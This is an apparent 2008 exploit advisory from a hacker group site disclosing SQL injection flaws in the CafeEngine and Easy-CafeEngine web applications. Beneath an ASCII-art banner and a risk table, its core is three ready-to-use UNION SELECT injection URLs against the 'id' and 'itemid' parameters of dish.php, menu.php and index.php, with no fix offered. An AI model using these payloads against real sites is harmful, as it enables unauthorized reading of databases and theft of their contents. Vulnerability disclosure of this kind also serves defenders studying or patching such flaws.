|
___________________________________________________________________________________________________________
| _ __ ___ ___ __________________ ___ ___ ____ ______ __ ___ _________________ _______ |
| | | / / / / / //_______ _______/ / / / // || ____|| |/ // ___________// \ |
| | | ^ / / / /_/ / /__/ / /___ ___ / /_/ // || | | v // /___ / O / |
| | | / \ / / / _ / / / / ____/ /__// __ // /| || | | \\ ____/ / / |
| | |/ \/ / / / / / / / / /_______ / / / // /_| || |___ | |\ \\ /__________ / /\ \ |
| | / /\ / /__/ /__/ /__/ /__________/ /__/ /__//________||______||__| \__\\___________//____/ \___\ |
| | / \/ |
| | / _____________________________________________________________________________________________________|
| | / / .: CafeEngine Multipe remote SQL Injection :. |
| |/ /______________________________________________________________________________________________________|
| v / Discoverd By: 0xFFFFFF . Main THX: ALLAH |
| / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team |
| / Mail: admin(at)white-hacker[dot]com . |
|/ Country: Algeria . |
v___________________________________________________________________________________________________________|
| Publication info :. |
|___________________________________________________________________________________________________________|
| Date: 19-09-2008 . Method : [*] GET [ ] POST |
| Content: Vulnerability . Register Globals : [ ] ON [*] OFF |
| Type: SQL injection . Magic quotes : [*] ON [ ] OFF |
| Application: Easy-Cafeengine / Cafeengine . Risk: [*] High [ ] medium [ ] Low |
| Venedor site: http://cafeengine.com/ . |
| Version: N/A . |
| Impact: Exploring Database . |
| Exploit: Available . |
| Fix: N/A . |
|___________________________________________________________________________________________________________|
| Description :. |
|___________________________________________________________________________________________________________|
| Input "id" passed into dish.php,menu.php pages is not properly verified, |
| a visitor can easily get sensitive information from the database by injecting SQL Querys |
| ......................................................................................................... |
| |
| CafeEngine Exploit : |
| [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10 |
| [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 |
| |
| Easy-CafeEngine Exploit: |
| [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9 |
|___________________________________________________________________________________________________________|
| Notice :. |
|___________________________________________________________________________________________________________|
| These publications are published for educational purpose thus the author will be not responsible |
| for any damage. |
|___________________________________________________________________________________________________________|
\ 漏 WHITE-HACKER All contents 漏 2008. All rights reserved. |
\____________________________________________________________|
# [2008-10-16]
|